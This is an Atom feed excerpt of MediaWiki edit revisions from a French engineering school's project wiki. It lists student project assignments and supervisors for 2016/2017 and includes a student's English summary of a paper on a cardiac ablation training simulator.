  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33703</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Projets_IMA5_2016/2017&amp;diff=33703"/>
				<updated>2016-09-26T11:53:43Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Julien SPANNEUT (SNCF) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 [Entreprise] Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Depres (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) / SNCF&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32637</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32637"/>
				<updated>2016-06-19T13:54:11Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To locate the pathological area, the surgeon uses a system that detect the zone with the fastest activation. It's the first step to do before strating the operation. Catheters, used to mesure a potential (or a difference of potential), give a tool for the cardiologist to interpret the electrical activity of the heart. Mesure a difference of potential is better, but this can only capture a potential. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As the surgeon mainly rely on the electrophysical signals, it's really important for the model to be trusted and precise. As so, they made a fonctionality that gives the bipolar signal by doing the difference between two unipolar signal, which gives a better precision. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The mapping evolves as the catheters go on the heart. For exemple, if one touches the heart wall, the mapping will change this way, and some triangles are displayed to warn the user. When he reaches the region to operate, the cardiologist uses an AC RF signal (between 300 and 700 kHz), which is delivered in an electrode in contact with the tissue to remove. To know if the operation was a succes, the electrical conductivity of the operated area must be none. The simulation modelize that by decreasing progressively the electrical potential of the area. The trainee can also choose the power of ablation, so the operation can be faster or slower. Then, to check if the operation was a succes, the simulator inject current (by pressing a pedal) to the area, and if no abnormal activity are dectecting, it means that the ablation was a success.&amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
To do such a difficult and precise work, the simulator needs good hardware : i7 processor, NVidia GTX 580 GPU. A table of result reveals that to be most effictive, the rookie surgeon needs to touch the heart wall the less possible time. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
As a conclusion, we can say that this simulator is really close to real time, but still needs some test in clinic to asses the model.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Main contribution ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;&lt;br /&gt;
The aim of the article is to introduce a system that can simulate a specific heart operation.&amp;lt;br&amp;gt; &lt;br /&gt;
The main contribution of the project is about helping the rookie cardiologist to improve their skills, by having them training on a system that can tell them if they have done some mistkaes. It present a new way of training, better than the old one (who was to train on a real patient, with the supervision of a senior cardiologist). Even if a real practice is always good, it's better to pratice first on a simulation program, which wont hurt anyone. &amp;lt;br&amp;gt; &lt;br /&gt;
The authors explain how every single part of the simulator work, and how they are connected to each other. They also show the results of the simulation, and point why and how the simulation is sometime worst than in an other time.&lt;br /&gt;
&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Applications ==&lt;br /&gt;
&lt;br /&gt;
We can think of many applications resulting for this simulator. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
The first one, which is the most obvious, is to introduce the simulator in medecine school, for students that wanted to be cardiologist in the future. With this simulator, in addition with training on a real heart, the students will be trained to the surgery, and even more, will be able to locate where they made mistakes, and then focus the next training to not remake the same mistakes, again. The software, wich gives a lot of feedback, will help them to improve their skills and abilities for surgery. &amp;lt;br&amp;gt; &lt;br /&gt;
But for me, it's also really important to practice in parrallel with a real heart. Indeed, the most efficient simulator with the best dedicated software will never be able to reproduce the exact same feeling and impressions that you feel when you are operating on a real heart. Even more, this operation on the simulator represents only the heart. A good improvement to this simulator will be to not only simulate the heart, but also the body around him, so that it represents the real conditions the surgeon is when he operates. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
We can also think of an application for others surgeries. This simulator only focus on electrocardiology procedures, but to do the same kind of simulator for other heart surgeries (or, even more, for other organ surgery) will be great for the students. &amp;lt;br&amp;gt; &lt;br /&gt;
The simulators offer a great perspective because of every possibilities that they have, they are harmless (unless you can hurt a computer ...) and also because they can be used an infinite time, whereas a real heart is made of flush, and flush always rot in the end. &amp;lt;br&amp;gt; &amp;lt;br /&amp;gt;&lt;br /&gt;
To finish, it can be a great idea to use this simulator to show the futur patient how the surgery will go. In general, doctors use a lot of very complicated terms, and often when you leave his office, you understand less things than before you came in. With this simulator, the surgeon will be able to show how the surgery will go, and also gives illustrated exemples if the patient has some questions.&amp;lt;br&amp;gt;&lt;br /&gt;
With the same idea, the simulator can be set in hospital, during open days for exemples, to explain to visitors how medecin works now.&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32622</id>
		<title>InitRech 2015/2016, sujet 11</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=InitRech_2015/2016,_sujet_11&amp;diff=32622"/>
				<updated>2016-06-19T13:42:07Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
== Summary ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;p&amp;gt;When a patient suffers cardiac arrhythmias or heart failure, caused by an abnormal electrical activity in the myocardium,  the standard procedure is to locate where the problem come from, and then destroy the cells that creates the unusual heart-beating by heating them using radio frequency ablation. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In order to train rookie surgeons on this kind of surgery, HAL proposed an interactive training system that allows the surgeons to practice based on a software called SOFA. Even if system like that already exist, the one introduce in this article (based on a device that already exist) combines a biophysical modeling of cardiac electrophysiology with an endovascular catheterization. The simulating framework allows to model a mapping of the heart, to do the ablation with real-time feedback, and then gives a synthesis of the surgery. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Based on an European database, a 3D view of the endovascular navigation around the heart is first built, using image visualization framework and software. Then, a venial view is also made, using a data set from a company. To finish, they simulate the heart beating by using an algorithm, which provides in the end the cardiac motion. &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
The GPU used in the program is based on Mitchell Schaeffer model. They choose this model because all 5 parameters had a physiological meaning, and the simulation is more acurate with this method. It captures the potential V&amp;lt;sub&amp;gt;M&amp;lt;/sub&amp;gt; of the transmembrane. In order to improve the result of the computer, they choose to apply this simulation only on the ventricules. They explain that it can be done because ventricles and atria are electrically isolated. With more than 30k elements, the electrophysiology of the ventricle is computed on a mesh. The time step used on this part is 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s. &lt;br /&gt;
To do every simulations at the same time, they use threads on the CPU with a scheduling structure : one thread for endovascular navigation and electrophysiology simulations, and another thread for the graphic view of the simulation. Both thread are asynchronous, because the time step for navigation simulation is greater than the time step mentioned before (0.02s &amp;amp; 10&amp;lt;sup&amp;gt;-4&amp;lt;/sup&amp;gt; s). &amp;lt;br&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
